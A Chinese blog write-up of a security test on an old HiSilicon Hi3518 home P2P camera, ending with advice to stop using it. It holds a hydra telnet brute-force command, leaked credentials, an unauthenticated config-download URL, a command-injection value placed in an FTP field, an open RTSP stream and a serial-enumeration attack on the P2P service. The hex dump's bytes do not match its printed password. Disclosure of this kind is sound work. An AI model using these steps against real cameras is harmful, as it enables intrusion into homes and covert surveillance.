家用WIFI网络摄像头(P2P)安全吗?记一次海思Hi3518方案摄像头的测试
作者:中国移动云能力中心 ——严金华
概要:海思Hi3518方案摄像头存在多个高危漏洞,此产品较老,目前网络上只有少量此类摄像头存在
0x00背景
15年左右在淘宝买了一个无线网络摄像头,搬家之后一直放在杂物堆里,最近重新上电装在客厅准备监控一下入户门,连接摄像头需要IP和管理密码,时间太长密码早就不记得了。于是拿出Goby扫一下局域网,找一下IP地址,并且顺便做个简单的测试。Goby扫描结果显示 开启了 两个端口:
23端口,telnet服务
81端口,Web服务,摄像头的管理界面,需要HTTP验证,密码应该设置过,现在忘了
0x01 Telnet爆破
直接hydra爆破一下 telnet服务
hydra 192.168.1.147 telnet -l root -P p.txt -t 32 -s 23 -e ns -f -V
好家伙,密码123456成功登录,登陆之后随便找找,/tmp/web下有一些配置文件
/tmp/web # ls -la *ini
lrwxrwxrwx 1 root 0 25 Oct 27 02:11 factory.ini -> /system/param/factory.ini
lrwxrwxrwx 1 root 0 30 Oct 27 02:11 factoryparam.ini -> /system/param/factoryparam.ini
lrwxrwxrwx 1 root 0 23 Oct 27 02:11 network-b.ini -> /system/www/network.ini
lrwxrwxrwx 1 root 0 23 Oct 27 02:11 network.ini -> /system/www/network.ini
lrwxrwxrwx 1 root 0 22 Oct 27 02:11 system-b.ini -> /system/www/system.ini
lrwxrwxrwx 1 root 0 22 Oct 27 02:11 system.ini -> /system/www/system.ini
/tmp/web #
system.ini里面就明文存了Web登录密码等信息,如下图账号admin,密码zheshimima,用这个账号密码登录web页面就可以看到监控视频了
00000680: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000690: 61 64 6D 69 6E 00 00 00 00 00 00 00 00 00 00 00 admin...........
000006a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000006b0: 6F 70 65 6E 31 34 32 38 35 37 00 00 00 00 00 00 zheshimima......
000006c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
000006d0: 03 01 0F 19 80 00 00 00 00 00 00 06 00 03 00 00 ................
000006e0: 00 80 7E 7E 76 01 00 00 01 14 1F 00 00 00 00 00 ..~~v...........
000006f0: 01 01 01 00 FF FF FF FF FF FF FF FF FF FF FF FF ................
00000700: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
00000710: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
00000720: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
00000730: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
00000740: FF FF FF FF FF FF FF FF B9 03 CE 00 14 01 00 00 ........9.N.....
00000750: 6E 00 A2 04 14 01 00 00 00 00 00 00 00 00 00 00 n.".............
00000760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000770: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
顺便看看 /etc/passwd
root:LSiuY7pOmZG2s:0:0:Administrator:/:/bin/sh
LSiuY7pOmZG2s是一个已知的弱口令hash,明文就是123456
0x02 Web端测试
这时候已经通过telnet掌握了这台摄像头的控制权了,但是如果telnet服务没开或者不是弱密码是否还有别的方法可以突破呢?继续挖掘下
浏览81端口web服务,这个设备支持两种验证模式
- HTTP 验证,就是401验证
- url后面加账号密码验证 (?loginuse=LOGIN&loginpas=PASS)
因为没有做密码重试次数的限制,也没有验证码,这两种方式都可以用Burp爆破
爆破不出来怎么办?继续往下看
无授权访问syetem.ini漏洞
正常访问下面的路径都提示需要账号密码
http://192.168.1.147:81/get_params.cgihttp://192.168.1.147:81/system.ini?
但是这里存在一个绕过。访问system.ini的时候 loginuse和loginpas传空j居然直接就把system.ini下载下来了
http://192.168.1.107:81/system.ini?loginuse&loginpas
下载到system.ini里面保存了明文的登录密码
远程命令执行漏洞
登录页面之后有一个功能是设置FTP服务器,摄像头可以定时把视频,照片上传到指定的FTP服务器上,可以填写一个IP或者域名,比如填写 `x.com, 设备就会去执行ftp x.com,这里存在一个命令执行漏洞
填写x.com; ping xxxxxxxx.dnslog.cn 可以在dnslog上看到回显
说明我们的命令执行了,此处可以开启telnet(假设telnetd关闭了)、修改root密码
未授权串流漏洞
也不需要不需要登录,直接用vlc打开 rtsp的串流地址就可以看到实时监控画面了
vlc rtsp://192.168.1.147:10554/tcp/av0_1
0x03 客户端测试
这个摄像头支持手机IOS,Android,PC客户端,和Web页面访问方式连接。其中Web端的攻击上文已经介绍过了,下面研究下客户端。
客户端连接方式
客户端可以在公网环境下访问到处于局域网内的监控,原理是通过一个中心服务器建立UDP隧道,原理和Zerotier是相似的。Zerotier的原理下次有机会讲。这个中心服务器由摄像头厂商提供,所以如果服务器挂了,客户端就无法工作了。客户端工作方式如图
使用一个唯一的序列号来区分摄像头,举例 “123456-ABCDE”,客户端首先请求服务器查询,123456-ABCDE的IP地址是多少,服务器会返回一个内网IP和一个公网IP出来,客户端在公网,会尝试访问摄像头的公网IP,一般情况下肯定连不上。然后服务端就和摄像头沟通,有个客户端想连你,但是连不上,建立一个udp隧道吧。
UDP隧道
UDP隧道的模型如下,其中cloud server在极端情况下会做中继转发客户端和摄像头之间的包;一般情况下服务器只是帮助客户端和摄像头之间建立udp隧道,客户端和摄像头之间通信可以在udp隧道下面实现P2P直连,这也是此类摄像头被叫做P2P的原因,这样直连正常情况下是可以跑满带宽的
[Android Application] <===UDP===> Cloud server <===UDP===> [Camera]
然后客户端使用udp隧道给摄像头发送HTTP请求,进行登录的验证
GET check_user.cgi?&loginuse=admin&loginpas=admin&user=admin&pwd=admin&
验证通过之后客户端就可以请求获取摄像的配置,看到监控画面,并且可以控制云台等
攻击方法
分析了之后,要知道攻击方法就非常简单了,只要访问厂商云服务器,提交某个序列号,服务就会返回摄像头的IP,然后就可以建立UDP连接,由于厂商服务器不保存摄像头的登录方式,所以不会在这个阶段之前进行校验摄像头密码,建立隧道之后可以爆破服务器密码,或者通过无授权访问system.ini获得账号密码。然后就不用再多说了吧。可以通过遍历序列号访问到任何一台摄像头(摄像头无需公网映射)
0x04 修复方案
这个方案摄像头毫无安全性可言,奉劝大家不要用了。如果实在想用,可以先把厂商服务器域名屏蔽了,禁止和厂商服务器建立任何链接,也就无法建立udp隧道了,但是这样客户端就不能用了。这样还是存在隐患,也没有其他更好的办法了,直接弃用才是正确方案
版权声明 (原创):本文内容由移动云用户自发贡献,版权归原作者所有,移动云开发者社区不拥有其著作权,亦不承担相应法律责任。如果您发现本社区有涉嫌抄袭的内容,可填写举报信息,一经查实,本社区将立刻删除涉嫌侵权内容。
家用WIFI网络摄像头(P2P)安全吗?记一次海思Hi3518方案摄像头的测试相关推荐
- 海思A182-Hi3516DV300推流摄像头数据
思A182-Hi3516DV300推流摄像头数据 如果已经按照上一篇文章移植成功了opendump说明你已经成功了一大半,但是下面的一半也不是随随便便成功的,在你想要把librtmp库移植到你的开发板 ...
- 海思3516, 单摄像头接hdmi,并输出h.265文件
在CSI1接一个GC2053, CSI输入决定了下面代码里面的ViDev. 在sample目录建一个子目录, 名字无所谓 建一个Makefile # Hisilicon Hi35xx sample M ...
- 完美的外出上网解决方案-随身随地享用你的专有WIFI网络(3G无线路由器+sim卡卡托+3G资费卡)...
距离元旦和春节长假越来越近了,相信周围很多朋友肯定是打算趁着长假出去旅旅游.正好前几天跟一个朋友聊到在外面上网不方便的问题.因此我今天专门写一篇Blog来介绍一下我当时去西藏时的上网解决方案,供周围有 ...
- 高清网络摄像机主流芯片方案之安霸、TI和海思对比
高清网络视频监控发展到今天,市场也开始进入真正的高清时代,诸多有实力的高清摄像机厂家的产品线也逐渐完善起来,高清网络视频监控的配套产品有更加丰富和成熟.与此同时困扰很多人的高清网络摄像机与后端平台或者 ...
- 主流芯片解决方案Ambarella的高清网络摄像机、德州仪器和控制海思
(本文由四川艾普作为数码科技有限公司 苏斌.范清华 收集) 高清网络视频监控发展到今天.正的高清时代.诸多有实力的高清摄像机厂家的产品线也逐渐完好起来,高清网络视频监控的配套产品有更加丰富和成熟.与此 ...
- 高清网络摄像机主流芯片方案之安霸、德仪和海思对比
(本文由四川艾普视达数码科技有限公司 苏彬.范清华 搜集整理) 高清网络视频监控发展到今天,市场也开始进入真正的高清时代,诸多有实力的高清摄像机厂家的产品线也逐渐完善起来,高清网络视频监控的配套产品有 ...
- wi-fi共享大师免广告_如何保护Wi-Fi网络免受入侵
wi-fi共享大师免广告 Insecure Wi-Fi is the easiest way for people to access your home network, leech your in ...
- 【2】Kali破解家用WI-FI密码 - WPA/WPA2加密
[学习记录] 本人小白一枚,文章用来记录自己目前的学习进度,希望能够用最通俗易懂的语言和命令来为大家讲清楚我的实验过程和经验,同时期待我的学习经验也可以帮助到大家.还望各位大佬能不吝朱玉,指出我的错误 ...
- 家用服务器 无线路由器,评测六款热门家用Wi-Fi 6路由器
2020年已经进入WiFi 6普及之年,以3000Mbps性能的WiFi 6路由器为例,其价格从高不可攀的千元级别,直降到300元左右的级别. 目前大多数家庭用户都愿意花钱升级网络体验,再结合千兆宽带 ...
- ARM加载Realtek-8188CUS USB无线网卡(二)_连接到WiFi网络
平台参数: 内核: Linux 3.6 文件系统:Busybox-1.20.2 硬件参数:S3C2416 三.工具准备.知识准备 曾经一个山民说过,磨刀不误砍柴工.捣鼓WiFi,,那么WiFi相关的知 ...
最新文章
- EventBus源码解析
- 《庆余年》,腾讯视频、爱奇艺为“互联网黑产”背锅的一出戏
- 看不见的战斗——阿里云护航世界杯直播容灾实践
- eclipse导入工程报错解决
- 在ASP.NET MVC中使用Knockout实践07,自定义验证信息的位置与内容
- some formulas for bloging
- SpringCloud
- 蓝蓝设计 使用全屏照片的网页设计欣赏
- 互联网教育:玩法与困境
- 第5节 vs中新建文件/筛选器/文件夹
- get与post的解释与区别
- microscan说明书_ALZET迷你渗透胶囊MODEL2002说明书中文
- 【DP学习总结】区间DP
- ESP8266Wi-Fi数据通讯
- linux12.12日学习整理(被逼无奈写的博客)
- FRM 5.2 资本资产定价模型
- 【cec14_func】修改版
- 分享两种给孩子取名字的方法
- discord linux_如何加入Discord服务器
- QFP PQFP LQFP TQFP封装区别!